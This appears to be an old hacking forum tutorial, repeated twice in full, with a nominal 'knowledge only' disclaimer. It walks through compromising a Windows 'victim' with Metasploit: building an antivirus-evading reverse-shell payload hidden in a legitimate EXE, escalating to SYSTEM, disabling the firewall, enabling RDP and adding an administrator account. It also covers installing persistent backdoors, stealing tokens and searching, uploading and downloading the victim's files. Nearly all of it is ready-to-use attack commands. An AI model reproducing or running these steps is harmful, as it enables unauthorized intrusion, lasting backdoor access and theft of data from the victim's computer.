Firstly i am telling you don't do this for illegal work this tutorial is only for knowledge enhancement. or do it on your own risk don't blame me for anything.
Tool require is metasploit.
# Here are some examples on [] from the guide beneath:
# set LHOST [IP ADRESS INT.] = set LHOST 192.168.1.15
# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"
# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg
# So when you input anything where there is [], remember to remove the []
-------------------------------------
cd /pentest/exploits/framework3/
svn up
# To update framework3
clear
./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
# If you get encoder error find another EXE or try to encode it less time
# Copy payload to target
-------------------------------------
cd /pentest/exploits/framework3/
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT] (if used in msfpayload in Shell 1)
show options
exploit
----------
# Now we wait for connection, so start the payload on victim computer
----------
use priv
ps
# Look for PID on explorer.exe
migrate [PID on explorer]
getsystem
sysinfo
# If "Arch = x64" = NO HASHDUMP it won't work
# Now we are in the system
-------------------------------------
shell
# Connect to CMD
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
# Allows incoming terminal service connections
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
# Disables blocking incoming Terminal service connections
Netsh firewall set opmode enable
# Enable Firewall on Victim
Netsh firewall set opmode disable
# Disable Firewall on Victim
net user [USERNAME] [PASSWORD]
# Change password for the user
# Or create you own user
net user [USERNAME] [PASSWORD] /add
net localgroup [GROUP] [USERNAME] /add
# In [GROUP] you could use "administrators" and [USERNAME] is the user you just created
net accounts /maxpwage:[days] | unlimited
# Examples: net accounts /maxpwage:6
# or: net accounts /maxpwage:unlimited
# CTRL + Z then Y to exit shell without it freezing the system
-------------------------------------
{Shell 3} (RDP to compromised system)
# No need for ":" and [PORT] if local
# Remember to be in "root@bt:~#"
rdesktop [IP]:[port] -u "[USERNAME]"
run metsvc (set backdoor for next time you want in)
(OR THIS)
run persistence -r [YOUR IP ADRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
# 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info
**UP- AND DOWNSIDES USING THIS***
METSVC:
VERY BAD: All 3 files is use gets flagged by Norton Internet Security 2011 as trojan, maybe other AV's will do this too!
BAD: If ip change you have to know the IP to connect back to Victim
GOOD: Easy to use
GOOD: It dosn't request YOUR IP and port!
PERSISTENCE:
BAD: It requests YOUR IP and port!
BAD: Can be more "difficult" to use
GOOD: Flexible
GOOD: Auto Connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) it is detected as bad, and will be removed. and that's a tool you must download!
-------------------------------------
{GET BACK INTO SYSTEM} (using metsvc in a new terminal)
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337 (Must be this port of what i know)
set RHOST [VICTIM IP ADRESS]
show options (see if your setup is correct)
exploit
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT]
# The port set in persistence backdoor
show options
exploit
----------
# Now we wait for connection, it will reconnect to your computer within 300 sec
----------
getuid
# If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":
ps
# Find PID on explorer.exe
steal_token [NUMBER - PID on explorer]
# From what i know it grants you the same rights as the user running that process
use priv
get system
------------------------------------
{Search} (in meterpreter console)
search -f *.jpg
# Finding all JPG files on the system
search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
# Finding all JPG filen i a specific folder
searct -f test.txt
# Find a specific file on the whole system
{Uploading and Downloading} (How I use it)
# Use "ls", "pwd" and "cd" to navigate around - see below under commands
Explanation:
Create a txt file on yout BT4 desktop and write any thing in it, or nothing, and save it with the name "test.txt" then in terminal in meterpreter console (after your connected to victim), navigate to the desktop of the user currently logged in.
Use "pwd" without quotes, to check if the path is correct, if it is type the following:
{Upload}
upload /root/test.txt test.txt
# and if you are uploading a file with space in it's name:
upload "/root/test 2.txt" "test 2.txt"
# Or if your not in the path where you want to upload a file, and want it to be uploaded to another folder
upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
# Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"
{Download}
Explanation:
Now we are going to download the file we just uploaded the "test.txt". Navigate to the folder if your not already in it, by using the "cd", "pwd" and "ls" commands.
Then type:
download test.txt /root/test.txt
# And if you are downloading a file with space in it's name
download "test 2.txt" "/root/test 2.txt"
# Or if your not in the path where you want to download a file from, but know the exact path and name by using search
download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
# Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"
Tool require is metasploit.
# Here are some examples on [] from the guide beneath:
# set LHOST [IP ADRESS INT.] = set LHOST 192.168.1.15
# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"
# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg
# So when you input anything where there is [], remember to remove the []
-------------------------------------
cd /pentest/exploits/framework3/
svn up
# To update framework3
clear
./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
# If you get encoder error find another EXE or try to encode it less time
# Copy payload to target
-------------------------------------
cd /pentest/exploits/framework3/
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT] (if used in msfpayload in Shell 1)
show options
exploit
----------
# Now we wait for connection, so start the payload on victim computer
----------
use priv
ps
# Look for PID on explorer.exe
migrate [PID on explorer]
getsystem
sysinfo
# If "Arch = x64" = NO HASHDUMP it won't work
# Now we are in the system
-------------------------------------
shell
# Connect to CMD
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
# Allows incoming terminal service connections
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
# Disables blocking incoming Terminal service connections
Netsh firewall set opmode enable
# Enable Firewall on Victim
Netsh firewall set opmode disable
# Disable Firewall on Victim
net user [USERNAME] [PASSWORD]
# Change password for the user
# Or create you own user
net user [USERNAME] [PASSWORD] /add
net localgroup [GROUP] [USERNAME] /add
# In [GROUP] you could use "administrators" and [USERNAME] is the user you just created
net accounts /maxpwage:[days] | unlimited
# Examples: net accounts /maxpwage:6
# or: net accounts /maxpwage:unlimited
# CTRL + Z then Y to exit shell without it freezing the system
-------------------------------------
{Shell 3} (RDP to compromised system)
# No need for ":" and [PORT] if local
# Remember to be in "root@bt:~#"
rdesktop [IP]:[port] -u "[USERNAME]"
run metsvc (set backdoor for next time you want in)
(OR THIS)
run persistence -r [YOUR IP ADRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
# 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info
**UP- AND DOWNSIDES USING THIS***
METSVC:
VERY BAD: All 3 files is use gets flagged by Norton Internet Security 2011 as trojan, maybe other AV's will do this too!
BAD: If ip change you have to know the IP to connect back to Victim
GOOD: Easy to use
GOOD: It dosn't request YOUR IP and port!
PERSISTENCE:
BAD: It requests YOUR IP and port!
BAD: Can be more "difficult" to use
GOOD: Flexible
GOOD: Auto Connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) it is detected as bad, and will be removed. and that's a tool you must download!
-------------------------------------
{GET BACK INTO SYSTEM} (using metsvc in a new terminal)
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337 (Must be this port of what i know)
set RHOST [VICTIM IP ADRESS]
show options (see if your setup is correct)
exploit
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT]
# The port set in persistence backdoor
show options
exploit
----------
# Now we wait for connection, it will reconnect to your computer within 300 sec
----------
getuid
# If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":
ps
# Find PID on explorer.exe
steal_token [NUMBER - PID on explorer]
# From what i know it grants you the same rights as the user running that process
use priv
get system
------------------------------------
{Search} (in meterpreter console)
search -f *.jpg
# Finding all JPG files on the system
search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
# Finding all JPG filen i a specific folder
searct -f test.txt
# Find a specific file on the whole system
{Uploading and Downloading} (How I use it)
# Use "ls", "pwd" and "cd" to navigate around - see below under commands
Explanation:
Create a txt file on yout BT4 desktop and write any thing in it, or nothing, and save it with the name "test.txt" then in terminal in meterpreter console (after your connected to victim), navigate to the desktop of the user currently logged in.
Use "pwd" without quotes, to check if the path is correct, if it is type the following:
{Upload}
upload /root/test.txt test.txt
# and if you are uploading a file with space in it's name:
upload "/root/test 2.txt" "test 2.txt"
# Or if your not in the path where you want to upload a file, and want it to be uploaded to another folder
upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
# Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"
{Download}
Explanation:
Now we are going to download the file we just uploaded the "test.txt". Navigate to the folder if your not already in it, by using the "cd", "pwd" and "ls" commands.
Then type:
download test.txt /root/test.txt
# And if you are downloading a file with space in it's name
download "test 2.txt" "/root/test 2.txt"
# Or if your not in the path where you want to download a file from, but know the exact path and name by using search
download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
# Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"
